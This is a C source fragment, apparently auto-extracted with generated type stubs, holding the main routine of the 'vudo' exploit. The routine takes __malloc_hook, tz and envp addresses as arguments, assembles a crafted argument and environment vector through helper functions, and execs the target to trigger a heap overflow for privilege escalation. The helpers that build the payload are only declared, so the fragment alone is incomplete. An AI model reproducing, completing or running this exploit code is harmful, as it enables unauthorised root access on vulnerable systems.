
typedef unsigned long size_t;
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;

typedef int bool;




typedef struct TYPE_7__ TYPE_1__ ;


struct TYPE_7__ {scalar_t__ __malloc_hook; scalar_t__ tz; scalar_t__ envp; scalar_t__ setenv; int * execve_envp; int * execve_argv; int NewArgv; int buf; int msg; } ;
typedef TYPE_1__ vudo_t ;


 scalar_t__ ULONG_MAX ;
 int execve (int ,int *,int *) ;
 int getuid () ;
 void* strtoul (char*,int *,int ) ;
 int usage (char*) ;
 int vudo_NewArgv (TYPE_1__*) ;
 int vudo_buf (TYPE_1__*) ;
 int * vudo_execve_argv (TYPE_1__*) ;
 int * vudo_execve_envp (TYPE_1__*) ;
 int vudo_msg (TYPE_1__*) ;
 scalar_t__ vudo_setenv (int ) ;

int
main( int argc, char * argv[] )
{
    vudo_t vudo;


    if ( argc != 4 ) {
        usage( argv[0] );
        return( -1 );
    }


    vudo.__malloc_hook = strtoul( argv[1], ((void*)0), 0 );
    if ( vudo.__malloc_hook == ULONG_MAX ) {
        return( -1 );
    }


    vudo.tz = strtoul( argv[2], ((void*)0), 0 );
    if ( vudo.tz == ULONG_MAX ) {
        return( -1 );
    }


    vudo.envp = strtoul( argv[3], ((void*)0), 0 );
    if ( vudo.envp == ULONG_MAX ) {
        return( -1 );
    }


    vudo.setenv = vudo_setenv( getuid() );
    if ( vudo.setenv == 0 ) {
        return( -1 );
    }


    vudo.msg = vudo_msg( &vudo );


    vudo.buf = vudo_buf( &vudo );


    vudo.NewArgv = vudo_NewArgv( &vudo );


    vudo.execve_argv = vudo_execve_argv( &vudo );
    if ( vudo.execve_argv == ((void*)0) ) {
        return( -1 );
    }


    vudo.execve_envp = vudo_execve_envp( &vudo );
    if ( vudo.execve_envp == ((void*)0) ) {
        return( -1 );
    }


    execve( (vudo.execve_argv)[0], vudo.execve_argv, vudo.execve_envp );
    return( -1 );
}
